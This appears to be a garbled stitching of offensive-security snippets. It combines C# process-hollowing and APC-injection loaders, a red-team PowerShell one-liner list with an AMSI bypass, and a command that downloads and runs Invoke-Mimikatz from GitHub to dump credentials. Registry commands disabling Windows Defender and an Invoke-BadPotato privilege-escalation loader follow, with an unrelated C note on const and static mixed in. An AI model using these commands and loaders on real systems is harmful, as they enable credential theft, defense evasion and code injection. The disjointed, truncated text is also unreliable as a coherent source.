/*************** | |
* Simple Process Hollowing in C# | |
* | |
* #Build Your Binaries | |
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe | |
* | |
* @author: Michael Gorelik <smgorelik@gmail.com> | |
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75 | |
* #Most of the code taken from here: @github: github.com/ambray |
# Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70 | |
# Description: | |
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
# AMSI Bypass (Matt Graeber) | |
Normal Version | |
------------------------ | |
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) |
*NOTE - These pull from public GitHub repos that are not under my control. Make sure you trust the content (or, better yet, make your own fork) before using it!* | |
#mimikatz [local] | |
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds; | |
#encoded-mimikatz [local] | |
powershell -enc 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 |
function Invoke-Mimikatz | |
{ | |
<# | |
.SYNOPSIS | |
This script leverages Mimikatz 2.2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as | |
dump credentials without ever writing the mimikatz binary to disk. | |
The script has a ComputerName parameter which allows it to be executed against multiple computers. | |
This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell v2 or higher installed. |
# Decompiles .\cs_bin\cobaltstrike.jar into .\cs_src\ using the JetBrains (FernFlower) console decompiler shipped as java-decompiler.jar.
# NOTE(review): -dgs selects decompilation of generic signatures; FernFlower's documented values are 0/1 — confirm that "true" is accepted by this build.
java -cp .\java-decompiler.jar org.jetbrains.java.decompiler.main.decompiler.ConsoleDecompiler -dgs=true .\cs_bin\cobaltstrike.jar .\cs_src\ |
/* | |
C | |
const | |
static | |
static const 区别 | |
*/ | |
const 表示常量,存储在静态存储区。 | |
static 修饰变量 仅作用在当前文件内 |
using System; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace DinjectorWithQUserAPC | |
{ | |
public class Program |
### Related to MalwareBytes LazyScripter https://blog.malwarebytes.com/malwarebytes-news/2021/02/lazyscripter-from-empire-to-double-rat | |
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | |
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtime |
function Invoke-BadPotato | |
{ | |
[CmdletBinding()] | |
Param ( | |
[String] | |
$Command = "whoami" | |
) | |
$a=New-Object IO.MemoryStream(,[Convert]::FromBAsE64String("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 |
using System; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
namespace Hollowing | |
{ | |
public class Loader | |
{ | |
public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe"); |